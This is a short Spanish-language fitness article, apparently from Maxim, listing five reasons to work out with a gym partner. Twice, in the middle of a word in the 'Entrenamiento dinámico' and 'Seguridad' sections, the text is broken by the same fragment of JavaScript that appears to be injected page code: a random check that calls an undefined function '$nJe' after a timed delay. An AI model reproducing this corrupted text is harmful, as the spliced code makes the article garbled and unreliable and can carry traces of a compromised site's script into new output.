Por qué ejercitarte con un gym partner
¿Cansado de ir al gimnasio solo? Consíguete un gym partner.
Autor: Elizabeth Rivera 7 febrero, 2020
FOTO: Shutterstock
Si eres de aquellos a los que ir al gimnasio les cuesta un poco, la mejor forma de animarte es tener un compañero/a que te acompañe.
Déjanos darte 5 razones para que vayas convenciendo a tu novia o a un buen amigo para que entrenen juntos.
Motivación
El tener a otra persona que entrene contigo te llenará de motivación. Si, por ejemplo, un día no quieres ir porque estás cansado o no tienes ganas, tener un compañero te obligará a ir a entrenar. Te sentirás con la obligación de cumplir con el o ella y seguramente la otra persona también te insistirá en ir.
Entrenamiento dinámico
Hacer ejercicio solo es monótono y tiende a ser aburrido. Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando tienes un gym partner el entrenamiento se vuelve más dinámico y divertido. Pueden platicar mientras hacen ejercicio o ayudarse mutuamente en alguna rutina.
Exigencia
Si tienes alguien con quien ir a ejercitarte, vas a comenzar a sentir la adrenalina de la competencia, pues esto es algo natural de los humanos. Ambos se retarán a lograr más y a alcanzar su peso objetivo. ¿Vas a quedarte atrás?
Seguridad
Un punto más a favor de ir con un compañero al gimnasio es la seguridad de ambos. Muchas veces los entrenadores tienen que estar al pendiente de todos los miembros del gimnasio y no podrán estarte checandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando. Para eso estarás tu y tu compañero. Pueden revisar si están haciendo bien un ejercicio, checar las técnicas y que el ángulo y la posición sean correctos para evitar lesiones o movimientos erróneos.
Diversión
Lo más importante de hacer ejercicio es divertirse y con un compañero te aseguramos que lo vas a lograr. Tener una compañía te dará ánimos, podrán bromear y pasarla muy bien mientras hacen su rutina.
POR QUÉ LOS BURPEES SON UN EJERCICIO ODIADO
Ver más de Maxim
¿Cansado de ir al gimnasio solo? Consíguete un gym partner.